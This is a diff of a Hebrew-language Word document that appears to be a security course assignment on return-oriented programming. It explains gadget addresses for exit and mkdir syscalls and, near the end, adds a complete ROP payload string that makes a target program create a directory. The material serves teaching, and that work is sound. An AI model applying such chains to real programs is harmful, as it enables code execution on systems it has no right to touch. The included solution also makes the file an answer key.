           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8196,6 +9006,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8207,29 +9018,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\x71\x0e\x40\x00\x00\x00\x00\x00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(\x71\x0e\x40\x00\x00\x00\x00\x00)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8237,6 +9029,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8248,9 +9041,34 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>“pop %rax”</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8258,6 +9076,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8269,6 +9088,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8280,6 +9100,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8291,29 +9112,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\x3c\x00\x00\x00\x00\x00\x00\x00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(\x3c\x00\x00\x00\x00\x00\x00\x00)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8321,27 +9123,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> יכילו את הערך שנרצה שיהיה ב-</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rax</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8353,6 +9160,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>60=0x3c</w:t>
@@ -8363,27 +9171,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> על מנת שכשנגיע ל-</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>syscall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8395,6 +9208,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>exit</w:t>
@@ -8405,27 +9219,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> עם ערך היציאה שב-</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rdi</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8437,6 +9256,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8448,6 +9268,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8459,29 +9280,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(\x78\x11\x40\x00\x00\x00\x00\x00)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8489,6 +9291,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8500,27 +9303,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">הם הכתובת של הפקודה </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>syscall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8532,6 +9340,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8544,6 +9353,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8555,48 +9365,57 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">מפני שבעת ביצוע </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>syscall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> הערך של </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rax</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -8607,27 +9426,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> הוא 60 והערך של </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rdi</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8639,6 +9463,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>0x48</w:t>
@@ -8649,6 +9474,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8660,6 +9486,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>0x48=72</w:t>
@@ -8670,6 +9497,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8681,7 +9509,7 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:bidi/>
         <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8845,6 +9673,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8855,6 +9684,7 @@
         </w:rPr>
         <w:t>my_first_rop</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8907,7 +9737,31 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (אוקטלי) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>אוקטלי</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8931,6 +9785,7 @@
         </w:rPr>
         <w:t>בות לדרך היציאה מהתוכנית ואין חשיבות לפלט שמודפס לגבי נכונות הסיסמה. בפרט, זה בסדר שהתוכנית תסתיים כתוצאה מ</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8941,6 +9796,7 @@
         </w:rPr>
         <w:t>segfault</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8988,35 +9844,61 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:bidi/>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:rtl/>
-          <w:lang w:val="he-IL"/>
-        </w:rPr>
-        <w:pict w14:anchorId="45C65C95">
-          <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-            <v:stroke joinstyle="miter"/>
-            <v:path gradientshapeok="t" o:connecttype="rect"/>
-          </v:shapetype>
-          <v:shape id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.75pt;margin-top:7.95pt;width:416.75pt;height:398.6pt;z-index:251659264;visibility:visible;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
-            <v:textbox style="mso-next-textbox:#_x0000_s1030">
-              <w:txbxContent>
-                <w:p/>
-              </w:txbxContent>
-            </v:textbox>
-            <w10:wrap type="square"/>
-          </v:shape>
-        </w:pict>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>הקלט שיגרום לתוכנית ליצור את התיקייה הוא:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>aaaaaaaaaaamy_first_rop\x00\x71\x0e\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\x1e\x0e\x40\x00\x00\x00\x00\x00\x71\x0e\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\x1e\x0e\x40\x00\x00\x00\x00\x00\x6d\x1b\x40\x00\x00\x00\x00\x00\xe3\xff\xff\xff\xff\xff\xff\xff\xf5\x08\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\xed\x01\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x71\x0e\x40\x00\x00\x00\x00\x00\x53\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

</xml_diff>